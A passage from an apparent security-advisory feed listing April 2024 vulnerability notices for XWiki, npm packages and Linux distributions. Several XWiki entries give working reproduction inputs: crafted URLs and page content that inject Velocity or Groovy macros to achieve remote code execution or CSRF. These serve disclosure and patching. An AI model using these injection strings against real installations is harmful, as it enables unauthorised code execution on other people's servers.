14.10.19, 15.5.4 and 15.9-RC1.### WorkaroundsWe're not aware of any workarounds apart from upgrading.### References* https://jira.xwiki.org/browse/XWIKI-21335* https://github.com/xwiki/xwiki-platform/commit/171e7c7d0e56deaa7b3678657ae26ef95379b1ea	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C2GG-4GQ4-JV5J
11.04.2024 01:01:58	maven	[MAVEN:GHSA-HF43-47Q4-FHQ5] XWiki Commons missing escaping of `{` in Velocity escapetool allows remote code execution (critical)	### ImpactThe HTML escaping of escaping tool that is used in XWiki doesn't escape `{`, which, when used in certain places, allows XWiki syntax injection and thereby remote code execution.To reproduce in an XWiki installation, open `<xwiki-host>/xwiki/bin/view/Panels/PanelLayoutUpdate?place=%7B%7B%2Fhtml%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request.eval)%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&eval=Hello%20from%20URL%20Parameter!%20I%20got%20programming%3A%20%24services.security.authorization.hasAccess(%27programming%27)` where `<xwiki-host>` is the URL of your XWiki installation. If this displays `You are not admin on this place Hello from URL Parameter! I got programming: true`, the installation is vulnerable.### PatchesThe vulnerability has been fixed on XWiki 14.10.19, 15.5.5, and 15.9 RC1.### WorkaroundsApart from upgrading, there is no generic workaround. However, replacing `$escapetool.html` by `$escapetool.xml` in XWiki documents fixes the vulnerability. In a standard XWiki installation, we're only aware of the document `Panels.PanelLayoutUpdate` that exposes this vulnerability, patching this document is thus a workaround. Any extension could expose this vulnerability and might thus require patching, too.### References- https://github.com/xwiki/xwiki-commons/commit/b94142e2a66ec32e89eacab67c3da8d91f5ef93a- https://jira.xwiki.org/browse/XCOMMONS-2828- https://jira.xwiki.org/browse/XWIKI-21438	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HF43-47Q4-FHQ5
10.04.2024 20:16:19	npm	[NPM:GHSA-HP8H-7X69-4WMV] zcap has incomplete expiration checks in capability chains. (moderate)	### ImpactWhen invoking a capability with a chain depth of 2, i.e., it is delegated directly from the root capability, the `expires` property is not properly checked against the current date or other `date` param. This can allow invocations outside of the original intended time period. A zcap still cannot be invoked without being able to use the associated private key material.### Patches`@digitalbazaar/zcap` v9.0.1 fixes expiration checking.### WorkaroundsA zcap could be revoked at any time.### Referenceshttps://github.com/digitalbazaar/zcap/pull/82	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HP8H-7X69-4WMV
10.04.2024 20:15:54	npm	[NPM:GHSA-9WWP-Q7WQ-JX35] @fastify/secure-session: Reuse of destroyed secure session cookie (high)	### ImpactAt the end of the request handling, it will encrypt all data in the session with a secret key and attach the ciphertext as a cookie value with the defined cookie name. After that, the session on the server side is destroyed. When an encrypted cookie with matching session name is provided with subsequent requests, it will decrypt the ciphertext to get the data. The plugin then creates a new session with the data in the ciphertext. Thus theoretically the web instance is still accessing the data from a server-side session, but technically that session is generated solely from a user provided cookie (which is assumed to be non-craftable because it is encrypted with a secret key not known to the user).The issue exists in the session removal process. In the delete function of the code, when the session is deleted, it is marked for deletion. However, if an attacker could gain access to the cookie, they could keep using it forever.### PatchesFixed in 56d66642ecc633cff0606927601e81cdac361370.Update to v7.3.0.### WorkaroundsInclude a "last update" field in the session, and treat "old sessions" as expired. Make sure to configure your cookie as "http only".### References* https://hackerone.com/reports/2374253	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9WWP-Q7WQ-JX35
11.04.2024 01:01:48	maven	[MAVEN:GHSA-R5VH-GC3R-R24W] XWiki Platform CSRF remote code execution through the realtime HTML Converter API (critical)	### ImpactWhen the realtime editor is installed in XWiki, it allows arbitrary remote code execution with the interaction of an admin user with programming right. More precisely, by getting an admin user to either visit a crafted URL or to view an image with this URL that could be in a comment, the attacker can get the admin to execute arbitrary XWiki syntax including scripting macros with Groovy or Python code. This compromises the confidentiality, integrity and availability of the whole XWiki installation.To reproduce on an XWiki installation, as an admin, click on `<xwiki-host>/xwiki/bin/get/RTFrontend/ConvertHTML?wiki=xwiki&space=Main&page=WebHome&text=%7B%7Bvelocity%7D%7D%24logtool.error%28%22Hello%20from%20Velocity%20%21%22%29%7B%7B%2Fvelocity%7D%7D`. If the error "Hello from Velocity!" gets logged then the installation is vulnerable.### PatchesThis vulnerability has been patched in XWiki 14.10.19, 15.5.4 and 15.9.### WorkaroundsUpdate `RTFrontend.ConvertHTML` following this [patch](https://github.com/xwiki/xwiki-platform/commit/4896712ee6483da623f131be2e618f1f2b79cb8d#diff-32a2a63950724b24e63587570cd95a41cf689111b8ba61c48dabee9effec6d61).This will, however, break some synchronization processes in the realtime editor, so upgrading should be the preferred way on installations where this editor is used.### References* https://jira.xwiki.org/browse/XWIKI-21424* https://github.com/xwiki/xwiki-platform/commit/4896712ee6483da623f131be2e618f1f2b79cb8d	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R5VH-GC3R-R24W
11.04.2024 01:01:41	maven	[MAVEN:GHSA-CV55-V6RW-7R5V] XWiki Platform remote code execution from account via custom skins support (critical)	### ImpactAny user who can edit any page like their profile can create a custom skin with a template override that is executed with programming right, thus allowing remote code execution. To reproduce, as a user without edit, script or admin right, add an object of class `XWiki.XWikiSkins` to your profile. Name it whatever you want and set the Base Skin to `flamingo`.Add an object of class `XWikiSkinFileOverrideClass` and set the path to `macros.vm` and the content to:```#macro(mediumUserAvatar $username) #resizedUserAvatar($username 50) $services.logging.getLogger('Skin').error("I got programming: $services.security.authorization.hasAccess('programming')")#end```Back to your profile, click `Test this skin`. Force a refresh, just in case.If the error "Skin - I got programming: true" gets logged, the installation is vulnerable.### PatchesThis has been patched in XWiki 14.10.19, 15.5.4 and 15.10RC1.### WorkaroundsWe're not aware of any workaround except upgrading.### References* https://jira.xwiki.org/browse/XWIKI-21478* https://github.com/xwiki/xwiki-platform/commit/3d4dbb41f52d1a6e39835cfb1695ca6668605a39 (>= 15.8 RC1)* https://github.com/xwiki/xwiki-platform/commit/da177c3c972e797d92c1a31e278f946012c41b56 (< 15.8 RC1)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CV55-V6RW-7R5V
11.04.2024 01:01:33	maven	[MAVEN:GHSA-37M4-HQXV-W26G] XWiki Platform CSRF remote code execution through scheduler job's document reference (critical)	### ImpactBy creating a document with a special crafted documented reference and an `XWiki.SchedulerJobClass` XObject, it is possible to execute arbitrary code on the server whenever an admin visits the scheduler page or the scheduler page is referenced, e.g., via an image in a comment on a page in the wiki.To reproduce on an XWiki installation, click on this link to create a new document : `<xwiki-host>/xwiki/bin/view/%22%3E%5D%5D%7B%7B%2Fhtml%7D%7D%7B%7Basync%20context%3D%22request/parameters%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request/eval%29/`.Then, add to this document an object of type `XWiki.SchedulerJobClass`.Finally, as an admin, go to `<xwiki-host>/xwiki/bin/view/Scheduler/?eval=$services.logging.getLogger(%22attacker%22).error(%22Hello%20from%20URL%20Parameter!%20I%20got%20programming:%20$services.security.authorization.hasAccess(%27programming%27)%22)`.If the logs contain `ERROR attacker - Hello from URL Parameter! I got programming: true`, the installation is vulnerable.### PatchesThe vulnerability has been fixed on XWiki 14.10.19, 15.5.5, and 15.9.### WorkaroundsModify the Scheduler.WebHome page following this [patch](https://github.com/xwiki/xwiki-platform/commit/f16ca4ef1513f84ce2e685d4a05d689bd3a2ab4c#diff-1e2995eacccbbbdcc4987ff64f46ac74837d166cf9e92920b4a4f8af0f10bd47).### References- https://jira.xwiki.org/browse/XWIKI-21416- https://github.com/xwiki/xwiki-platform/commit/f16ca4ef1513f84ce2e685d4a05d689bd3a2ab4c	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-37M4-HQXV-W26G
11.04.2024 01:01:26	maven	[MAVEN:GHSA-J2R6-R929-V6GF] XWiki Platform CSRF in the job scheduler (moderate)	### ImpactIt is possible to schedule/trigger/unschedule existing jobs by having an admin visit the Job Scheduler page through a predictable URL, for example by embedding such an URL in any content as an image.To reproduce in an XWiki installation, open `<xwiki-host>:/xwiki/bin/view/Scheduler/?do=trigger&which=Scheduler.NotificationEmailDailySender` as a user with admin rights. If there is no error message that indicates the CSRF token is invalid, the installation is vulnerable.### PatchesThe vulnerability has been fixed on XWiki 14.10.19, 15.5.5, and 15.9.### WorkaroundsModify the Scheduler.WebHome page following this [patch](https://github.com/xwiki/xwiki-platform/commit/f16ca4ef1513f84ce2e685d4a05d689bd3a2ab4c#diff-1e2995eacccbbbdcc4987ff64f46ac74837d166cf9e92920b4a4f8af0f10bd47).### References- https://jira.xwiki.org/browse/XWIKI-20851- https://github.com/xwiki/xwiki-platform/commit/f16ca4ef1513f84ce2e685d4a05d689bd3a2ab4c	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J2R6-R929-V6GF
11.04.2024 01:01:18	maven	[MAVEN:GHSA-XM4H-3JXR-M3C6] XWiki Platform: Remote code execution through space title and Solr space facet (critical)	### ImpactBy creating a document with a specially crafted title, it is possible to trigger remote code execution in the (Solr-based) search in XWiki. This allows any user who can edit the title of a space (all users by default) to execute any Groovy code in the XWiki installation which compromises the confidentiality, integrity and availability of the whole XWiki installation.To reproduce, as a user without script nor programming rights, create a document with title `{{/html}}{{async}}{{groovy}}println("Hello from Groovy Title!"){{/groovy}}{{/async}}` and content `Test Document`. Using the search UI, search for `"Test Document"`, then deploy the `Location` facet on the right of the screen, next to the search results. The installation is vulnerable if you see an item such as:```Hello from Groovy Title!</a><div class="itemCount">1</div></li></ul>{{/html}}```### PatchesThis has been patched in XWiki 14.10.20, 15.5.4 and 15.10 RC1.### WorkaroundsModify the `Main.SolrSpaceFacet` page following this [patch](https://github.com/xwiki/xwiki-platform/commit/acba74c149a041345b24dcca52c586f872ba97fb#diff-22dd1949ed9019a39f2550f5a953a1a967c30a374dc9eeddb74069bf229b17d5).### References* https://jira.xwiki.org/browse/XWIKI-21471* https://github.com/xwiki/xwiki-platform/commit/acba74c149a041345b24dcca52c586f872ba97fb* https://github.com/xwiki/xwiki-platform/commit/74e301c481e69eeea674dac7fed6af3614cf08c5	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XM4H-3JXR-M3C6
11.04.2024 01:01:11	maven	[MAVEN:GHSA-XXP2-9C9G-7WMJ] XWiki Platform: Remote code execution from edit in multilingual wikis via translations (critical)	### ImpactIn multilingual wikis, translations can be edited by any user who has edit right, circumventing the rights that are normally required for authoring translations (script right for user-scope translations, wiki admin for translations on the wiki). This can be exploited for remote code execution if the translation value is not properly escaped where it is used. To reproduce, in a multilingual wiki, as a user without script or admin right, edit a translation of `AppWithinMinutes.Translations` and in the line `platform.appwithinminutes.description=` add `{{async}}{{groovy}}println("Hello from Translation"){{/groovy}}{{/async}}` at the end. Then open the app with in minutes home page (`AppWithinMinutes.WebHome`) in the same locale. If translations are still working and "Hello from Translation" is displayed at the end of the introduction, the installation is vulnerable.### PatchesThis has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1.### WorkaroundsWe're not aware of any workaround except restricting edit right on documents that contain translations.### References* https://jira.xwiki.org/browse/XWIKI-21411* https://github.com/xwiki/xwiki-platform/commit/c4c8d61c30de72298d805ccc82df2a307f131c54	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XXP2-9C9G-7WMJ
11.04.2024 01:01:01	maven	[MAVEN:GHSA-2858-8CFX-69M9] XWiki Platform: Remote code execution as guest via DatabaseSearch (critical)	### ImpactXWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation.To reproduce on an instance, without being logged in, go to `<hostname>/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If the title of the RSS channel contains `Hello from search text:42`, the instance is vulnerable.### PatchesThis vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1.### WorkaroundsIt is possible to manually apply [this patch](https://github.com/xwiki/xwiki-platform/commit/95bdd6cc6298acdf7f8f21298d40eeb8390a8565#diff-ef3314b8bb489e5368618ea1940c59098b18ec2246cc65fe337ae636de87e404) to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.### References* https://jira.xwiki.org/browse/XWIKI-21472* https://github.com/xwiki/xwiki-platform/commit/95bdd6cc6298acdf7f8f21298d40eeb8390a8565	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2858-8CFX-69M9
11.04.2024 01:00:52	maven	[MAVEN:GHSA-VXWR-WPJV-QJQ7] XWiki Platform: Privilege escalation (PR) from user registration through PDFClass (critical)	### ImpactRemote code execution is possible via PDF export templates.To reproduce on an installation, register a new user account with username `PDFClass` if `XWiki.PDFClass` does not exist.On `XWiki.PDFClass`, use the class editor to add a "style" property of type "TextArea" and content type "Plain Text".Then, add an object of class `PDFClass` and set the "style" attribute to `$services.logging.getLogger('PDFClass').error("I got programming: $services.security.authorization.hasAccess('programming')")`.Finally, go to `<host>/xwiki/bin/export/Main/WebHome?format=pdf&pdftemplate=XWiki.PDFClass`. If the logs contain "ERROR PDFClass - I got programming: true", the instance is vulnerable.### PatchesThis vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10-rc-1.### WorkaroundsIf PDF templates are not typically used on the instance, an administrator can create the document `XWiki.PDFClass` and block its edition, after making sure that it does not contain a `style` attribute.Otherwise, the instance needs to be updated.### References- https://jira.xwiki.org/browse/XWIKI-21337- https://github.com/xwiki/xwiki-platform/commit/d28e21a670c69880b951e415dd2ddd69d273eae9	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VXWR-WPJV-QJQ7
11.04.2024 01:00:41	maven	[MAVEN:GHSA-34FJ-R5GQ-7395] XWiki Platform: Remote code execution from account via SearchSuggestSourceSheet (critical)	### ImpactAny user with edit right on any page can execute any code on the server by adding an object of type `XWiki.SearchSuggestSourceClass` to their user profile or any other page. This compromises the confidentiality, integrity and availability of the whole XWiki installation.To reproduce on an instance, as a user without script nor programming rights, add an object of type `XWiki.SearchSuggestSourceClass` to your profile page. On this object, set every possible property to `}}}{{async}}{{groovy}}println("Hello from Groovy!"){{/groovy}}{{/async}}` (i.e., name, engine, service, query, limit and icon). Save and display the page, then append `?sheet=XWiki.SearchSuggestSourceSheet` to the URL. If any property displays as `Hello from Groovy!}}}`, then the instance is vulnerable.### PatchesThis vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10 RC1.### Workarounds[This patch](https://github.com/xwiki/xwiki-platform/commit/6a7f19f6424036fce3d703413137adde950ae809#diff-67b473d2b6397d65b7726c6a13555850b11b10128321adf9e627e656e1d130a5) can be manually applied to the document `XWiki.SearchSuggestSourceSheet`.### References* https://jira.xwiki.org/browse/XWIKI-21474* https://github.com/xwiki/xwiki-platform/commit/6a7f19f6424036fce3d703413137adde950ae809	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-34FJ-R5GQ-7395
11.04.2024 00:42:01	maven	[MAVEN:GHSA-V782-XR4W-3VQX] XWiki Platform: Password hash might be leaked by diff once the xobject holding them is deleted (moderate)	### ImpactIt is possible to access the hash of a password by using the diff feature of the history whenever the object storing the password is deleted. Using that vulnerability it's possible for an attacker to have access to the hash password of a user if they have rights to edit the users' page. Now with the default right scheme in XWiki this vulnerability is normally prevented on user profiles, except by users with Admin rights. Note that this vulnerability also impacts any extensions that might use passwords stored in xobjects: for those usecases it depends on the right of those pages.There is currently no way to be 100% sure that this vulnerability has been exploited, as an attacker with enough privilege could have deleted the revision where the xobject was deleted after rolling-back the deletion. But again, this operation requires high privileges on the target page (Admin right). A page with a user password xobject which have in its history a revision where the object has been deleted should be considered at risk and the password should be changed there.### PatchesThe vulnerability has been patched in XWiki 14.10.19, 15.5.4 and 15.9-rc-1 by performing a better check before dislaying data of a diff, to ensure it's not coming from a password field. ### WorkaroundsAdmins should ensure that the user pages are properly protected: the edit right shouldn't be allowed for other users than Admin and owner of the profile (which is the default right). Now there's not much workaround possible for a privileged user other than upgrading XWiki. ### References* JIRA ticket: https://jira.xwiki.org/browse/XWIKI-19948* Commit: https://github.com/xwiki/xwiki-platform/commit/f1eaec1e512220fabd970d053c627e435a1652cf### For more informationIf you have any questions or comments about this advisory:* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)* Email us at [Security Mailing List](mailto:security@xwiki.org)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V782-XR4W-3VQX
10.04.2024 19:38:15	ubuntu	[USN-6728-1] Squid vulnerabilities (high)	Several security issues were fixed in Squid.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6728-1
11.04.2024 01:05:08	maven	[MAVEN:GHSA-JPMX-996V-48FM] WildFly Elytron: OIDC app attempting to access the second tenant, the user should be prompted to log (high)	A flaw was found in JBoss EAP. When an OIDC app that serves multiple tenants attempts to access the second tenant, it should prompt the user to log in again since the second tenant is secured with a different OIDC configuration. The underlying issue is in OidcSessionTokenStore when determining if a cached token should be used or not. This logic needs to be updated to take into account the new "provider-url" option in addition to the "realm" option.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JPMX-996V-48FM
10.04.2024 16:40:08	ubuntu	[USN-6727-1] NSS vulnerabilities (medium)	Several security issues were fixed in NSS.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6727-1
10.04.2024 15:24:42	ubuntu	[USN-6719-2] util-linux vulnerability	util-linux could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6719-2
10.04.2024 03:00:00	oraclelinux	[ELSA-2024-1750] unbound security update (important)	[1.16.2-3.5]- Rebuilt again with z-stream target[1.16.2-3.4]- Correct typo in new config file[1.16.2-3.3]- Ensure group access correction reaches also updated configs (CVE-2024-1488)[1.16.2-3.2]- Ensure only unbound group can change configuration (CVE-2024-1488)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1750
10.04.2024 03:00:00	oraclelinux	[ELSA-2024-12276] virt:kvm_utils3 security update (moderate)	hivexlibguestfslibguestfs-winsupport[8.9-1]- Rebase to ntfs-3g 2022.10.3- Fixes: CVE-2022-40284- resolves: rhbz#2236372libiscsilibnbdlibtpmslibvirt[9.0.0-5]- Fix off-by-one error in udevListInterfacesByStatus (Martin Kletzander) [Orabug: 36364464] {CVE-2024-1441}libvirt-dbuslibvirt-python[9.0.0-5]- Update to libvirt 9.0.0-5 (Karl Heubaum)nbdkitnetcfperl-Sys-Virtqemu-kvm[7.2.0-11]- vfio/migration: Add a note about migration rate limiting (Avihai Horon) [Orabug: 36329758]- vfio/migration: Refactor vfio_save_state() return value (Avihai Horon) [Orabug: 36329758]- migration: Don't serialize devices in qemu_savevm_state_iterate() (Avihai Horon) [Orabug: 36329758]- ui/clipboard: add asserts for update and request (Fiona Ebner) [Orabug: 36323175] {CVE-2023-6683}- ui/clipboard: mark type as not available when there is no data (Fiona Ebner) [Orabug: 36323175] {CVE-2023-6683}- virtio-net: correctly copy vnet header when flushing TX (Jason Wang) [Orabug: 36154459] {CVE-2023-6693}- esp: restrict non-DMA transfer length to that of available data (Mark Cave-Ayland) [Orabug: 36322141] {CVE-2024-24474}- vhost: Perform memory section dirty scans once per iteration (Si-Wei Liu)- vhost: dirty log should be per backend type (Si-Wei Liu)- net: Update MemReentrancyGuard for NIC (Akihiko Odaki) [Orabug: 35644197] {CVE-2023-3019}- net: Provide MemReentrancyGuard * to qemu_new_nic() (Akihiko Odaki) [Orabug: 35644197] {CVE-2023-3019}- lsi53c895a: disable reentrancy detection for MMIO region, too (Thomas Huth) [Orabug: 33774027] {CVE-2021-3750}- memory: stricter checks prior to unsetting engaged_in_io (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}- async: avoid use-after-free on re-entrancy guard (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}- apic: disable reentrancy detection for apic-msi (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}- raven: disable reentrancy detection for iomem (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}- bcm2835_property: disable reentrancy detection for iomem (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}- lsi53c895a: disable reentrancy detection for script RAM (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}- hw: replace most qemu_bh_new calls with qemu_bh_new_guarded (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}- checkpatch: add qemu_bh_new/aio_bh_new checks (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}- async: Add an optional reentrancy guard to the BH API (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}- memory: prevent dma-reentracy issues (Alexander Bulekov) [Orabug: 33774027] {CVE-2021-3750}- hw/acpi: propagate vcpu hotplug after switch to modern interface (Aaron Young)- migration: Fix use-after-free of migration state object (Fabiano Rosas) [Orabug: 36242218]- kvm: Fix crash due to access uninitialized kvm_state (Gavin Shan) [Orabug: 36269244]- migration: Avoid usage of static variable inside tracepoint (Joao Martins)- migration: Add tracepoints for downtime checkpoints (Peter Xu)- migration: migration_stop_vm() helper (Peter Xu)- migration: Add per vmstate downtime tracepoints (Peter Xu)- migration: Add migration_downtime_start\|end() helpers (Peter Xu)- migration: Set downtime_start even for postcopy (Peter Xu)- hv-balloon: implement pre-Glib 2.68 compatibility (Maciej S. Szmigiero)- hw/i386/pc: Support hv-balloon (Maciej S. Szmigiero)- qapi: Add HV_BALLOON_STATUS_REPORT event and its QMP query command (Maciej S. Szmigiero)- qapi: Add query-memory-devices support to hv-balloon (Maciej S. Szmigiero)- Add Hyper-V Dynamic Memory Protocol driver (hv-balloon) hot-add support (Maciej S. Szmigiero)- Add Hyper-V Dynamic Memory Protocol driver (hv-balloon) base (Maciej S. Szmigiero)- Add Hyper-V Dynamic Memory Protocol definitions (Maciej S. Szmigiero)- memory-device: Drop size alignment check (David Hildenbrand)- memory-device: Support empty memory devices (David Hildenbrand)- memory,vhost: Allow for marking memory device memory regions unmergeable (David Hildenbrand)- memory: Clarify mapping requirements for RamDiscardManager (David Hildenbrand)- memory-device,vhost: Support automatic decision on the number of memslots (David Hildenbrand)- vhost: Add vhost_get_max_memslots() (David Hildenbrand)- kvm: Add stub for kvm_get_max_memslots() (David Hildenbrand)- memory-device,vhost: Support memory devices that dynamically consume memslots (David Hildenbrand)- memory-device: Track required and actually used memslots in DeviceMemoryState (David Hildenbrand)- stubs: Rename qmp_memory_device.c to memory_device.c (David Hildenbrand)- memory-device: Support memory devices with multiple memslots (David Hildenbrand)- vhost: Return number of free memslots (David Hildenbrand)- kvm: Return number of free memslots (David Hildenbrand)- vhost: Remove vhost_backend_can_merge() callback (David Hildenbrand)- vhost: Rework memslot filtering and fix 'used_memslot' tracking (David Hildenbrand)- virtio-md-pci: New parent type for virtio-mem-pci and virtio-pmem-pci (David Hildenbrand)- migration/ram: Expose ramblock_is_ignored() as migrate_ram_is_ignored() (David Hildenbrand)- virtio-mem: Skip most of virtio_mem_unplug_all() without plugged memory (David Hildenbrand)- softmmu/physmem: Warn with ram_block_discard_range() on MAP_PRIVATE file mapping (David Hildenbrand)- memory-device: Track used region size in DeviceMemoryState (David Hildenbrand)- memory-device: Refactor memory_device_pre_plug() (David Hildenbrand)- hw/i386/pc: Remove PC_MACHINE_DEVMEM_REGION_SIZE (David Hildenbrand)- hw/i386/acpi-build: Rely on machine->device_memory when building SRAT (David Hildenbrand)- hw/i386/pc: Use machine_memory_devices_init() (David Hildenbrand)- hw/loongarch/virt: Use machine_memory_devices_init() (David Hildenbrand)- hw/ppc/spapr: Use machine_memory_devices_init() (David Hildenbrand)- hw/arm/virt: Use machine_memory_devices_init() (David Hildenbrand)- memory-device: Introduce machine_memory_devices_init() (David Hildenbrand)- memory-device: Unify enabled vs. supported error messages (David Hildenbrand)- hw/scsi/scsi-disk: Disallow block sizes smaller than 512 [CVE-2023-42467] (Thomas Huth) [Orabug: 35808564] {CVE-2023-42467}- tests/qtest: ahci-test: add test exposing reset issue with pending callback (Fiona Ebner) [Orabug: 35977245] {CVE-2023-5088}- hw/ide: reset: cancel async DMA operation before resetting state (Fiona Ebner) [Orabug: 35977245] {CVE-2023-5088}seabiossgabiossuperminswtpmvirt-v2v	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12276
10.04.2024 03:00:00	redhat	[RHSA-2024:1750] unbound security update (important)	The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver.Security Fix(es):* A vulnerability was found in Unbound due to incorrect default permissions,allowing any process outside the unbound group to modify the unbound runtimeconfiguration. The default combination of the "control-use-cert: no" option witheither explicit or implicit use of an IP address in the "control-interface"option could allow improper access. If a process can connect over localhost toport 8953, it can alter the configuration of unbound.service. This flaw allowsan unprivileged local process to manipulate a running instance, potentiallyaltering forwarders, allowing them to track all queries forwarded by the localresolver, and, in some cases, disrupting resolving altogether.To mitigate the vulnerability, a new file"/etc/unbound/conf.d/remote-control.conf" has been added and included in themain unbound configuration file, "unbound.conf". The file contains twodirectives that should limit access to unbound.conf: control-interface: "/run/unbound/control" control-use-cert: "yes"For details about these directives, run "man unbound.conf".Updating to the version of unbound provided by this advisory should, in mostcases, address the vulnerability. To verify that your configuration is notvulnerable, use the "unbound-control status \| grep control" command. If theoutput contains "control(ssl)" or "control(namedpipe)", your configuration isnot vulnerable. If the command output returns only "control", the configurationis vulnerable because it does not enforce access only to the unbound groupmembers. To fix your configuration, add the line "include:/etc/unbound/conf.d/remote-control.conf" to the end of the file"/etc/unbound/unbound.conf". If you use a custom"/etc/unbound/conf.d/remote-control.conf" file, add the new directives to thisfile. (CVE-2024-1488)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1750
11.04.2024 01:00:53	maven	[MAVEN:GHSA-QMR3-52XF-WMHX] Apache Zeppelin: LDAP search filter query Injection Vulnerability (moderate)	Improper Input Validation vulnerability in Apache Zeppelin.The attackers can execute malicious queries by setting improper configuration properties to LDAP search filter.This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.Users are recommended to upgrade to version 0.11.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QMR3-52XF-WMHX
11.04.2024 01:00:41	maven	[MAVEN:GHSA-G44M-X5H7-FR5Q] Apache Zeppelin: Cron arbitrary user impersonation with improper privileges (moderate)	Improper Input Validation vulnerability in Apache Zeppelin.The attackers can call updating cron API with invalid or improper privileges so that the notebook can run with the privileges.This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.Users are recommended to upgrade to version 0.11.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G44M-X5H7-FR5Q
10.04.2024 11:54:24	almalinux	[ALSA-2024:1719] rear security update (moderate)	rear security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1719
10.04.2024 17:16:19	almalinux	[ALSA-2024:1690] varnish security update (important)	varnish security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1690
10.04.2024 21:19:12	npm	[NPM:GHSA-VC6Q-CCJ9-9R89] MailDev Remote Code Execution (critical)	MailDev 2 through 2.1.0 allows Remote Code Execution via a crafted Content-ID header for an e-mail attachment, leading to `lib/mailserver.js` writing arbitrary code into the `routes.js` file.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VC6Q-CCJ9-9R89
12.04.2024 02:02:32	ubuntu	[USN-6730-1] Apache Maven Shared Utils vulnerability (critical)	maven-shared-utils could be made to run programs if it receivedspecially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6730-1
12.04.2024 00:30:32	npm	[NPM:GHSA-X565-32QP-M3VF] phin may include sensitive headers in subsequent requests after redirect (moderate)	### ImpactUsers may be impacted if sending requests including sensitive data in specific headers with `followRedirects` enabled.### PatchesThe [follow-redirects](https://github.com/follow-redirects/follow-redirects) library is now being used for redirects and removes some headers that may contain sensitive information in some situations.### WorkaroundsN/A. Please update to resolve the issue.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-X565-32QP-M3VF
11.04.2024 23:17:56	npm	[NPM:GHSA-WM4W-7H2Q-3PF7] Matrix IRC Bridge truncated content of messages can be leaked (moderate)	### ImpactThe matrix-appservice-irc before version 2.0.0 can be exploited to leak the truncated body of a message if a malicious user sends a Matrix reply to an event ID they don't have access to. As a precondition to the attack, the malicious user needs to know the event ID of the message they want to leak, as well as to be joined to both the Matrix room and the IRC channel it is bridged to.The message reply containing the leaked message content is visible to IRC channel members when this happens.### Patchesmatrix-appservice-irc 2.0.0 checks whether the user has permission to view an event before constructing a reply. Administrators should upgrade to this version.### WorkaroundsIt's possible to limit the amount of information leaked by setting a reply template that doesn't contain the original message. See [these lines](https://github.com/matrix-org/matrix-appservice-irc/blob/d5d67d1d3ea3f0f6962a0af2cc57b56af3ad2129/config.sample.yaml#L601-L604) in the configuration file.### Referenceshttps://github.com/matrix-org/matrix-appservice-irc/pull/1799### For more informationIf you have any questions or comments about this advisory, please email us at [security at matrix.org](mailto:security@matrix.org).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WM4W-7H2Q-3PF7
